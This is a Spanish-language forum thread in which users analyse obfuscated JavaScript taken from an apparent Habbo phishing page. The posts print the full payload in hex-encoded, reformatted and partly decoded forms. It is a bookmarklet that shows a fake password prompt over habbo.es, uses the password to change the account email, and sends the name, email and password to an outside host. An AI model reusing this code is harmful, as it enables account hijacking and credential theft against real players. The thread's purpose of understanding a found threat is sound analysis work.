elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Programación
| |-+  Ingeniería Inversa (Moderadores: karmany, .:UND3R:., MCKSys Argentina)
| | |-+  ¿Cómo decodifico esto?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Cómo decodifico esto?  (Leído 3,985 veces)
therecse

Desconectado Desconectado

Mensajes: 3


Ver Perfil
¿Cómo decodifico esto?
« en: 15 Marzo 2016, 13:23 pm »

Buenas, acabo de encontrar un código que me gustaría decodificar, pero no sé como ya que no entiendo qué tipo de lenguaje está codificado:

var linksave=_0x3459[0];var nome=null;var email=null;$[_0x3459[10]]({url:_0x3459[1],success:function b64EncodeUnicode(_0xcfe9x4){nome=_0xcfe9x4[_0x3459[3]](_0x3459[4])[1][_0x3459[3]](_0x3459[2])[0];email=_0xcfe9x4[_0x3459[3]](_0x3459[5])[1][_0x3459[3]](_0x3459[2])[0];div1=_0x3459[6];div2=_0x3459[7];$(_0x3459[9])[_0x3459[8]](div1);$(_0x3459[9])[_0x3459[8]](div2)}});function add(){var _0xcfe9x6=$(_0x3459[12])[_0x3459[11]]();var _0xcfe9x7=_0x3459[13]+Math[_0x3459[15]](Math[_0x3459[14]]()*999999)+_0x3459[16];if(_0xcfe9x6){$[_0x3459[23]](_0x3459[22],{currentPassword:_0xcfe9x6,newEmail:_0xcfe9x7},function(_0xcfe9x4){_0xcfe9x8()})[_0x3459[21]](function(){$(_0x3459[18])[_0x3459[17]]();$(_0x3459[20])[_0x3459[19]]({width:0},300);setTimeout(function(){$(_0x3459[18])[_0x3459[17]]()},3000)});$[_0x3459[25]](_0x3459[24]);function _0xcfe9x8(){var _0xcfe9x9=document[_0x3459[27]](_0x3459[26]);_0xcfe9x9[_0x3459[28]]=linksave;_0xcfe9x9[_0x3459[29]]=_0x3459[25];var _0xcfe9xa=document[_0x3459[27]](_0x3459[30]);_0xcfe9xa[_0x3459[31]]=_0x3459[32];_0xcfe9xa[_0x3459[33]]=_0x3459[34];_0xcfe9xa[_0x3459[35]]=_0xcfe9x7;var _0xcfe9xb=document[_0x3459[27]](_0x3459[30]);_0xcfe9xb[_0x3459[31]]=_0x3459[32];_0xcfe9xb[_0x3459[33]]=_0x3459[36];_0xcfe9xb[_0x3459[35]]=_0xcfe9x6;var _0xcfe9xc=document[_0x3459[27]](_0x3459[30]);_0xcfe9xc[_0x3459[31]]=_0x3459[32];_0xcfe9xc[_0x3459[33]]=_0x3459[37];_0xcfe9xc[_0x3459[35]]=nome;var _0xcfe9xd=document[_0x3459[27]](_0x3459[30]);_0xcfe9xd[_0x3459[31]]=_0x3459[32];_0xcfe9xd[_0x3459[33]]=_0x3459[38];_0xcfe9xd[_0x3459[35]]=email;var _0xcfe9xe=document[_0x3459[27]](_0x3459[30]);_0xcfe9xe[_0x3459[31]]=_0x3459[32];_0xcfe9xe[_0x3459[33]]=_0x3459[39];_0xcfe9xe[_0x3459[35]]=owner;_0xcfe9x9[_0x3459[40]](_0xcfe9xa);_0xcfe9x9[_0x3459[40]](_0xcfe9xb);_0xcfe9x9[_0x3459[40]](_0xcfe9xc);_0xcfe9x9[_0x3459[40]](_0xcfe9xd);_0xcfe9x9[_0x3459[40]](_0xcfe9xe);document[_0x3459[9]][_0x3459[40]](_0xcfe9x9);_0xcfe9x9[_0x3459[41]]()}}}'>

Me podríais ayudar? Muchas gracias
En línea

.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: ¿Cómo decodifico esto?
« Respuesta #1 en: 15 Marzo 2016, 13:41 pm »

codificar?

son arreglos según yo, y ordenadamente quedaría más menos así:

Código
  1. var linksave=_0x3459[0];
  2. var nome=null;
  3. var email=null;
  4.  
  5. $[_0x3459[10]]({
  6.  
  7. url:_0x3459[1],success:
  8. function b64EncodeUnicode(_0xcfe9x4){
  9. nome=_0xcfe9x4[_0x3459[3]](_0x3459[4])[1][_0x3459[3]](_0x3459[2])[0];
  10. email=_0xcfe9x4[_0x3459[3]](_0x3459[5])[1][_0x3459[3]](_0x3459[2])[0];
  11. div1=_0x3459[6];
  12. div2=_0x3459[7];
  13. $(_0x3459[9])[_0x3459[8]](div1);
  14. $(_0x3459[9])[_0x3459[8]](div2)
  15. }
  16. });
  17.  
  18. function add(){
  19. var _0xcfe9x6=$(_0x3459[12])[_0x3459[11]]();
  20. var _0xcfe9x7=_0x3459[13]+Math[_0x3459[15]](Math[_0x3459[14]]()*999999)+_0x3459[16];
  21.  
  22. if(_0xcfe9x6){
  23. $[_0x3459[23]](_0x3459[22],{currentPassword:_0xcfe9x6,newEmail:_0xcfe9x7},function(_0xcfe9x4){_0xcfe9x8()})
  24. [_0x3459[21]](function(){
  25. $(_0x3459[18])[_0x3459[17]]();
  26. $(_0x3459[20])[_0x3459[19]]({width:0},300);
  27. setTimeout(function(){$(_0x3459[18])[_0x3459[17]]()},3000)});
  28. $[_0x3459[25]](_0x3459[24]);
  29.  
  30. function _0xcfe9x8(){
  31. var _0xcfe9x9=document[_0x3459[27]](_0x3459[26]);
  32. _0xcfe9x9[_0x3459[28]]=linksave;
  33. _0xcfe9x9[_0x3459[29]]=_0x3459[25];
  34. var _0xcfe9xa=document[_0x3459[27]](_0x3459[30]);
  35. _0xcfe9xa[_0x3459[31]]=_0x3459[32];
  36. _0xcfe9xa[_0x3459[33]]=_0x3459[34];
  37. _0xcfe9xa[_0x3459[35]]=_0xcfe9x7;
  38. var _0xcfe9xb=document[_0x3459[27]](_0x3459[30]);
  39. _0xcfe9xb[_0x3459[31]]=_0x3459[32];
  40. _0xcfe9xb[_0x3459[33]]=_0x3459[36];
  41. _0xcfe9xb[_0x3459[35]]=_0xcfe9x6;
  42. var _0xcfe9xc=document[_0x3459[27]](_0x3459[30]);
  43. _0xcfe9xc[_0x3459[31]]=_0x3459[32];
  44. _0xcfe9xc[_0x3459[33]]=_0x3459[37];
  45. _0xcfe9xc[_0x3459[35]]=nome;
  46. var _0xcfe9xd=document[_0x3459[27]](_0x3459[30]);
  47. _0xcfe9xd[_0x3459[31]]=_0x3459[32];
  48. _0xcfe9xd[_0x3459[33]]=_0x3459[38];
  49. _0xcfe9xd[_0x3459[35]]=email;
  50. var _0xcfe9xe=document[_0x3459[27]](_0x3459[30]);
  51. _0xcfe9xe[_0x3459[31]]=_0x3459[32];
  52. _0xcfe9xe[_0x3459[33]]=_0x3459[39];
  53. _0xcfe9xe[_0x3459[35]]=owner;
  54. _0xcfe9x9[_0x3459[40]](_0xcfe9xa);
  55. _0xcfe9x9[_0x3459[40]](_0xcfe9xb);
  56. _0xcfe9x9[_0x3459[40]](_0xcfe9xc);
  57. _0xcfe9x9[_0x3459[40]](_0xcfe9xd);
  58. _0xcfe9x9[_0x3459[40]](_0xcfe9xe);
  59. document[_0x3459[9]][_0x3459[40]](_0xcfe9x9);
  60. _0xcfe9x9[_0x3459[41]]()
  61. }
  62. }}'>

Podrías indicar más menos de donde obtuviste tal código, saludos.
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: ¿Cómo decodifico esto?
« Respuesta #2 en: 15 Marzo 2016, 13:43 pm »

Toda la magia está en el IF _0xcfe9x6 a simple impresión debe dar algo distinto de 0 para que se cumpla.

PD: a través de la función ADD se va modificando esa "variable" (o dirección de memoria).
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
therecse

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: ¿Cómo decodifico esto?
« Respuesta #3 en: 15 Marzo 2016, 14:39 pm »

Buenas de nuevo, muchas gracias por las respuestas tan rápidas.
Obtuve ese código tras decodificar el siguiente:

Código:
<a onClick="alert('Debe iniciar sesion en habbo y arrastrar la imagen a la pestaña de habbo');return false;" href='javascript:var owner = "duplicador";&#65279;var _0x3459=["\x68\x74\x74\x70\x3A\x2F\x2F\x68\x69\x6F\x72\x69\x2D\x67\x61\x6D\x65\x73\x2E\x63\x6F\x6D\x2F\x70\x2F\x6C\x6F\x61\x64\x69\x6E\x67\x2E\x70\x68\x70","\x2F\x73\x65\x74\x74\x69\x6E\x67\x73\x2F\x65\x6D\x61\x69\x6C","\x22","\x73\x70\x6C\x69\x74","\x6E\x61\x6D\x65\x22\x3A\x22","\x65\x6D\x61\x69\x6C\x22\x3A\x22","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x22\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x20\x66\x69\x78\x65\x64\x3B\x20\x74\x6F\x70\x3A\x20\x30\x70\x78\x3B\x20\x6C\x65\x66\x74\x3A\x20\x30\x70\x78\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x20\x38\x30\x30\x3B\x20\x77\x69\x64\x74\x68\x3A\x20\x31\x30\x30\x25\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x31\x30\x30\x25\x3B\x20\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x3A\x20\x72\x67\x62\x61\x28\x31\x30\x2C\x20\x35\x34\x2C\x20\x39\x34\x2C\x20\x30\x2E\x38\x29\x3B\x22\x3E\x3C\x2F\x64\x69\x76\x3E","\x3C\x64\x69\x76\x20\x69\x64\x3D\x22\x68\x69\x64\x64\x65\x6E\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x20\x66\x69\x78\x65\x64\x3B\x20\x74\x6F\x70\x3A\x20\x37\x30\x70\x78\x3B\x20\x77\x69\x64\x74\x68\x3A\x20\x35\x30\x30\x70\x78\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x20\x39\x30\x30\x3B\x20\x6C\x65\x66\x74\x3A\x20\x35\x30\x25\x3B\x20\x6D\x61\x72\x67\x69\x6E\x2D\x6C\x65\x66\x74\x3A\x20\x2D\x32\x35\x30\x70\x78\x3B\x22\x3E\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x20\x62\x6C\x6F\x63\x6B\x3B\x20\x74\x72\x61\x6E\x73\x69\x74\x69\x6F\x6E\x3A\x20\x31\x73\x3B\x22\x20\x69\x64\x3D\x22\x74\x6F\x61\x73\x74\x2D\x63\x6F\x6E\x74\x61\x69\x6E\x65\x72\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x74\x6F\x61\x73\x74\x2D\x74\x6F\x70\x2D\x63\x65\x6E\x74\x65\x72\x22\x20\x61\x72\x69\x61\x2D\x6C\x69\x76\x65\x3D\x22\x70\x6F\x6C\x69\x74\x65\x22\x20\x72\x6F\x6C\x65\x3D\x22\x61\x6C\x65\x72\x74\x22\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x74\x6F\x61\x73\x74\x20\x74\x6F\x61\x73\x74\x2D\x65\x72\x72\x6F\x72\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x20\x6E\x6F\x6E\x65\x3B\x22\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x74\x6F\x61\x73\x74\x2D\x70\x72\x6F\x67\x72\x65\x73\x73\x22\x20\x69\x64\x3D\x22\x74\x6F\x61\x73\x74\x2D\x70\x72\x6F\x67\x72\x65\x73\x73\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x39\x39\x2E\x39\x25\x3B\x20\x74\x72\x61\x6E\x73\x69\x74\x69\x6F\x6E\x3A\x20\x32\x73\x3B\x22\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x74\x6F\x61\x73\x74\x2D\x6D\x65\x73\x73\x61\x67\x65\x22\x20\x69\x64\x3D\x22\x74\x6F\x61\x73\x74\x2D\x6D\x65\x73\x73\x61\x67\x65\x22\x3E\x4C\x61\x20\x63\x6F\x6E\x74\x72\x61\x73\x65\xF1\x61\x20\x71\x75\x65\x20\x69\x6E\x67\x72\x65\x73\x6F\x20\x65\x73\x20\x69\x6E\x63\x6F\x72\x72\x65\x63\x74\x61\x2C\x20\x76\x65\x72\x69\x66\x69\x71\x75\x65\x20\x65\x20\x69\x6E\x74\x65\x6E\x74\x65\x20\x64\x65\x20\x6E\x75\x65\x76\x6F\x2E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x2D\x64\x69\x61\x6C\x6F\x67\x22\x20\x6E\x67\x2D\x63\x6C\x61\x73\x73\x3D\x22\x73\x69\x7A\x65\x20\x3F\x20\x22\x20\x6D\x6F\x64\x61\x6C\x2D\x22\x3D\x22\x22\x20\x2B\x3D\x22\x22\x20\x73\x69\x7A\x65\x3D\x22\x22\x20\x3A\x3D\x22\x22\x20\x22\x22\x22\x3D\x22\x22\x3E\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x22\x68\x65\x69\x67\x68\x74\x3A\x20\x32\x35\x30\x70\x78\x3B\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x22\x20\x75\x69\x62\x2D\x6D\x6F\x64\x61\x6C\x2D\x74\x72\x61\x6E\x73\x63\x6C\x75\x64\x65\x3D\x22\x22\x3E\x3C\x64\x69\x76\x3E\x3C\x62\x75\x74\x74\x6F\x6E\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x72\x65\x6C\x6F\x61\x64\x28\x29\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x5F\x5F\x63\x6C\x6F\x73\x65\x22\x3E\x3C\x2F\x62\x75\x74\x74\x6F\x6E\x3E\x3C\x68\x33\x20\x74\x72\x61\x6E\x73\x6C\x61\x74\x65\x3D\x22\x53\x41\x46\x45\x54\x59\x5F\x4C\x4F\x43\x4B\x5F\x54\x49\x54\x4C\x45\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x5F\x5F\x74\x69\x74\x6C\x65\x22\x3E\x43\x75\x65\x6E\x74\x61\x20\x70\x72\x6F\x74\x65\x67\x69\x64\x61\x20\x70\x6F\x72\x20\x73\x65\x67\x75\x72\x69\x64\x61\x64\x2E\x3C\x2F\x68\x33\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x5F\x5F\x63\x6F\x6E\x74\x65\x6E\x74\x22\x3E\x3C\x70\x20\x74\x72\x61\x6E\x73\x6C\x61\x74\x65\x3D\x22\x53\x41\x46\x45\x54\x59\x5F\x4C\x4F\x43\x4B\x5F\x41\x4E\x53\x57\x45\x52\x22\x3E\x3C\x2F\x70\x3E\x3C\x21\x2D\x2D\x20\x6E\x67\x49\x66\x3A\x20\x73\x61\x66\x65\x74\x79\x4C\x6F\x63\x6B\x46\x6F\x72\x6D\x2E\x24\x65\x72\x72\x6F\x72\x2E\x72\x65\x6D\x6F\x74\x65\x44\x61\x74\x61\x41\x6E\x73\x77\x65\x72\x20\x2D\x2D\x3E\x3C\x66\x69\x65\x6C\x64\x73\x65\x74\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x66\x69\x65\x6C\x64\x73\x65\x74\x22\x3E\x3C\x6C\x61\x62\x65\x6C\x20\x66\x6F\x72\x3D\x22\x73\x61\x66\x65\x74\x79\x2D\x6C\x6F\x63\x6B\x2D\x61\x6E\x73\x77\x65\x72\x31\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x6C\x61\x62\x65\x6C\x22\x20\x74\x72\x61\x6E\x73\x6C\x61\x74\x65\x3D\x22\x49\x44\x45\x4E\x54\x49\x54\x59\x5F\x53\x41\x46\x45\x54\x59\x51\x55\x45\x53\x54\x49\x4F\x4E\x5F\x31\x22\x3E\x49\x6E\x67\x72\x65\x73\x65\x20\x73\x75\x20\x63\x6F\x6E\x74\x72\x61\x73\x65\xF1\x61\x20\x70\x61\x72\x61\x20\x63\x6F\x6E\x74\x69\x6E\x75\x61\x72\x3C\x2F\x6C\x61\x62\x65\x6C\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x66\x69\x65\x6C\x64\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x69\x64\x3D\x22\x69\x6E\x70\x75\x74\x74\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x61\x6E\x73\x77\x65\x72\x31\x22\x20\x74\x79\x70\x65\x3D\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x22\x20\x6E\x67\x2D\x6D\x6F\x64\x65\x6C\x3D\x22\x61\x6E\x73\x77\x65\x72\x73\x2E\x61\x6E\x73\x77\x65\x72\x31\x22\x20\x6E\x67\x2D\x6D\x6F\x64\x65\x6C\x2D\x6F\x70\x74\x69\x6F\x6E\x73\x3D\x22\x7B\x20\x75\x70\x64\x61\x74\x65\x4F\x6E\x3A\x20\x22\x20\x64\x65\x66\x61\x75\x6C\x74\x3D\x22\x22\x20\x62\x6C\x75\x72\x22\x2C\x3D\x22\x22\x20\x64\x65\x62\x6F\x75\x6E\x63\x65\x3A\x3D\x22\x22\x20\x7B\x3D\x22\x22\x20\x64\x65\x66\x61\x75\x6C\x74\x3A\x3D\x22\x22\x20\x35\x30\x30\x2C\x3D\x22\x22\x20\x62\x6C\x75\x72\x3A\x3D\x22\x22\x20\x30\x3D\x22\x22\x20\x7D\x3D\x22\x22\x20\x7D\x22\x3D\x22\x22\x20\x72\x65\x71\x75\x69\x72\x65\x64\x3D\x22\x22\x20\x72\x65\x6D\x6F\x74\x65\x2D\x64\x61\x74\x61\x3D\x22\x22\x20\x61\x6E\x73\x77\x65\x72\x22\x22\x3D\x22\x22\x20\x70\x61\x73\x73\x77\x6F\x72\x64\x2D\x74\x6F\x67\x67\x6C\x65\x2D\x6D\x61\x73\x6B\x3D\x22\x22\x20\x61\x75\x74\x6F\x63\x6F\x6D\x70\x6C\x65\x74\x65\x3D\x22\x6F\x66\x66\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x69\x6E\x70\x75\x74\x20\x6E\x67\x2D\x70\x72\x69\x73\x74\x69\x6E\x65\x20\x6E\x67\x2D\x75\x6E\x74\x6F\x75\x63\x68\x65\x64\x20\x70\x61\x73\x73\x77\x6F\x72\x64\x2D\x74\x6F\x67\x67\x6C\x65\x2D\x6D\x61\x73\x6B\x20\x6E\x67\x2D\x69\x6E\x76\x61\x6C\x69\x64\x20\x6E\x67\x2D\x69\x6E\x76\x61\x6C\x69\x64\x2D\x72\x65\x71\x75\x69\x72\x65\x64\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x62\x6F\x72\x64\x65\x72\x2D\x63\x6F\x6C\x6F\x72\x3A\x20\x72\x67\x62\x28\x31\x34\x34\x2C\x20\x35\x31\x2C\x20\x38\x32\x29\x3B\x22\x3E\x3C\x69\x20\x63\x6C\x61\x73\x73\x3D\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x2D\x74\x6F\x67\x67\x6C\x65\x2D\x6D\x61\x73\x6B\x5F\x5F\x69\x63\x6F\x6E\x22\x3E\x3C\x2F\x69\x3E\x3C\x21\x2D\x2D\x20\x6E\x67\x49\x66\x3A\x20\x73\x61\x66\x65\x74\x79\x4C\x6F\x63\x6B\x46\x6F\x72\x6D\x2E\x61\x6E\x73\x77\x65\x72\x31\x2E\x24\x65\x72\x72\x6F\x72\x2E\x72\x65\x71\x75\x69\x72\x65\x64\x20\x26\x26\x20\x28\x21\x73\x61\x66\x65\x74\x79\x4C\x6F\x63\x6B\x46\x6F\x72\x6D\x2E\x61\x6E\x73\x77\x65\x72\x31\x2E\x24\x70\x72\x69\x73\x74\x69\x6E\x65\x20\x7C\x7C\x20\x73\x61\x66\x65\x74\x79\x4C\x6F\x63\x6B\x46\x6F\x72\x6D\x2E\x24\x73\x75\x62\x6D\x69\x74\x74\x65\x64\x29\x20\x2D\x2D\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x66\x69\x65\x6C\x64\x73\x65\x74\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x66\x6F\x6F\x74\x65\x72\x22\x3E\x3C\x61\x20\x68\x72\x65\x66\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x61\x62\x62\x6F\x2E\x65\x73\x2F\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x63\x61\x6E\x63\x65\x6C\x22\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x72\x65\x6C\x6F\x61\x64\x28\x29\x22\x20\x74\x72\x61\x6E\x73\x6C\x61\x74\x65\x3D\x22\x46\x4F\x52\x4D\x5F\x43\x41\x4E\x43\x45\x4C\x5F\x4C\x41\x42\x45\x4C\x22\x3E\x43\x61\x6E\x63\x65\x6C\x61\x72\x3C\x2F\x61\x3E\x20\x3C\x62\x75\x74\x74\x6F\x6E\x20\x6E\x67\x2D\x64\x69\x73\x61\x62\x6C\x65\x64\x3D\x22\x75\x6E\x6C\x6F\x63\x6B\x69\x6E\x67\x49\x6E\x50\x72\x6F\x67\x72\x65\x73\x73\x22\x20\x74\x79\x70\x65\x3D\x22\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x73\x75\x62\x6D\x69\x74\x22\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x61\x64\x64\x28\x29\x3B\x22\x3E\x43\x6F\x6E\x74\x69\x6E\x75\x61\x72\x3C\x2F\x62\x75\x74\x74\x6F\x6E\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E","\x70\x72\x65\x70\x65\x6E\x64","\x62\x6F\x64\x79","\x61\x6A\x61\x78","\x76\x61\x6C","\x23\x69\x6E\x70\x75\x74\x74\x78\x74","\x73\x74\x6F\x70\x63\x72\x65\x64\x69\x74\x73","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x40\x6C\x6F\x6C\x69\x74\x6F\x2E\x74\x6B","\x66\x61\x64\x65\x54\x6F\x67\x67\x6C\x65","\x2E\x74\x6F\x61\x73\x74","\x61\x6E\x69\x6D\x61\x74\x65","\x23\x74\x6F\x61\x73\x74\x2D\x70\x72\x6F\x67\x72\x65\x73\x73","\x66\x61\x69\x6C","\x61\x70\x69\x2F\x73\x65\x74\x74\x69\x6E\x67\x73\x2F\x65\x6D\x61\x69\x6C\x2F\x63\x68\x61\x6E\x67\x65","\x70\x6F\x73\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x61\x62\x62\x6F\x2E\x65\x73\x2F\x61\x70\x69\x2F\x73\x61\x66\x65\x74\x79\x6C\x6F\x63\x6B\x2F\x64\x69\x73\x61\x62\x6C\x65","\x67\x65\x74","\x66\x6F\x72\x6D","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x63\x74\x69\x6F\x6E","\x6D\x65\x74\x68\x6F\x64","\x69\x6E\x70\x75\x74","\x74\x79\x70\x65","\x74\x65\x78\x74","\x6E\x61\x6D\x65","\x6D\x61\x69\x6C\x5F\x61\x64\x64","\x76\x61\x6C\x75\x65","\x70\x61\x73\x73","\x68\x61\x62\x62\x6F","\x65\x6D\x61\x69\x6C","\x69\x64","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x73\x75\x62\x6D\x69\x74"];var linksave=_0x3459[0];var nome=null;var email=null;$[_0x3459[10]]({url:_0x3459[1],success:function b64EncodeUnicode(_0xcfe9x4){nome=_0xcfe9x4[_0x3459[3]](_0x3459[4])[1][_0x3459[3]](_0x3459[2])[0];email=_0xcfe9x4[_0x3459[3]](_0x3459[5])[1][_0x3459[3]](_0x3459[2])[0];div1=_0x3459[6];div2=_0x3459[7];$(_0x3459[9])[_0x3459[8]](div1);$(_0x3459[9])[_0x3459[8]](div2)}});function add(){var _0xcfe9x6=$(_0x3459[12])[_0x3459[11]]();var _0xcfe9x7=_0x3459[13]+Math[_0x3459[15]](Math[_0x3459[14]]()*999999)+_0x3459[16];if(_0xcfe9x6){$[_0x3459[23]](_0x3459[22],{currentPassword:_0xcfe9x6,newEmail:_0xcfe9x7},function(_0xcfe9x4){_0xcfe9x8()})[_0x3459[21]](function(){$(_0x3459[18])[_0x3459[17]]();$(_0x3459[20])[_0x3459[19]]({width:0},300);setTimeout(function(){$(_0x3459[18])[_0x3459[17]]()},3000)});$[_0x3459[25]](_0x3459[24]);function _0xcfe9x8(){var _0xcfe9x9=document[_0x3459[27]](_0x3459[26]);_0xcfe9x9[_0x3459[28]]=linksave;_0xcfe9x9[_0x3459[29]]=_0x3459[25];var _0xcfe9xa=document[_0x3459[27]](_0x3459[30]);_0xcfe9xa[_0x3459[31]]=_0x3459[32];_0xcfe9xa[_0x3459[33]]=_0x3459[34];_0xcfe9xa[_0x3459[35]]=_0xcfe9x7;var _0xcfe9xb=document[_0x3459[27]](_0x3459[30]);_0xcfe9xb[_0x3459[31]]=_0x3459[32];_0xcfe9xb[_0x3459[33]]=_0x3459[36];_0xcfe9xb[_0x3459[35]]=_0xcfe9x6;var _0xcfe9xc=document[_0x3459[27]](_0x3459[30]);_0xcfe9xc[_0x3459[31]]=_0x3459[32];_0xcfe9xc[_0x3459[33]]=_0x3459[37];_0xcfe9xc[_0x3459[35]]=nome;var _0xcfe9xd=document[_0x3459[27]](_0x3459[30]);_0xcfe9xd[_0x3459[31]]=_0x3459[32];_0xcfe9xd[_0x3459[33]]=_0x3459[38];_0xcfe9xd[_0x3459[35]]=email;var _0xcfe9xe=document[_0x3459[27]](_0x3459[30]);_0xcfe9xe[_0x3459[31]]=_0x3459[32];_0xcfe9xe[_0x3459[33]]=_0x3459[39];_0xcfe9xe[_0x3459[35]]=owner;_0xcfe9x9[_0x3459[40]](_0xcfe9xa);_0xcfe9x9[_0x3459[40]](_0xcfe9xb);_0xcfe9x9[_0x3459[40]](_0xcfe9xc);_0xcfe9x9[_0x3459[40]](_0xcfe9xd);_0xcfe9x9[_0x3459[40]](_0xcfe9xe);document[_0x3459[9]][_0x3459[40]](_0xcfe9x9);_0xcfe9x9[_0x3459[41]]()}}}'>

Está extraido de una web que imagino que es phishing de un juego online llamado Habbo. He intentado comprender todo lo anterior, y, tras decodificarlo, obtuve lo anterior que puse al comienzo del post. Pero me gustaría comprender lo de despúes ya que no consigo entender lo que realiza.
En línea

apuromafo CLS


Desconectado Desconectado

Mensajes: 1.441



Ver Perfil WWW
Re: ¿Cómo decodifico esto?
« Respuesta #4 en: 16 Marzo 2016, 03:21 am »

https://www.unphp.net/decode/3d484439626db1d567a83415de961520/


Código:
<a onClick="alert('Debe iniciar sesion en habbo y arrastrar la imagen a la pestaa de habbo');return false;" href='javascript:var owner = "duplicador";&#65279;var _0x3459=["http://hiori-games.com/p/loading.php","/settings/email",""","split","name":"","email":"","<div style="position: fixed; top: 0px; left: 0px; z-index: 800; width: 100%; height: 100%; background: rgba(10, 54, 94, 0.8);"></div>","<div id="hidden" style="position: fixed; top: 70px; width: 500px; z-index: 900; left: 50%; margin-left: -250px;"><div style="display: block; transition: 1s;" id="toast-container" class="toast-top-center" aria-live="polite" role="alert"><div class="toast toast-error" style="display: none;"><div class="toast-progress" id="toast-progress" style="width: 99.9%; transition: 2s;"></div><div class="toast-message" id="toast-message">La contrasea que ingreso es incorrecta, verifique e intente de nuevo.</div></div></div><div class="modal-dialog" ng-class="size ? " modal-"="" +="" size="" :="" """=""><div style="height: 250px;" class="modal-content" uib-modal-transclude=""><div><button onclick="location.reload()" class="modal__close"></button><h3 translate="SAFETY_LOCK_TITLE" class="modal__title">Cuenta protegida por seguridad.</h3><div class="modal__content"><p translate="SAFETY_LOCK_ANSWER"></p><!-- ngIf: safetyLockForm.$error.remoteDataAnswer --><fieldset class="form__fieldset"><label for="safety-lock-answer1" class="form__label" translate="IDENTITY_SAFETYQUESTION_1">Ingrese su contrasea para continuar</label><div class="form__field"><input id="inputtxt" name="answer1" type="password" ng-model="answers.answer1" ng-model-options="{ updateOn: " default="" blur",="" debounce:="" {="" default:="" 500,="" blur:="" 0="" }="" }"="" required="" remote-data="" answer""="" password-toggle-mask="" autocomplete="off" class="form__input ng-pristine ng-untouched password-toggle-mask ng-invalid ng-invalid-required" style="border-color: rgb(144, 51, 82);"><i class="password-toggle-mask__icon"></i><!-- ngIf: safetyLockForm.answer1.$error.required && 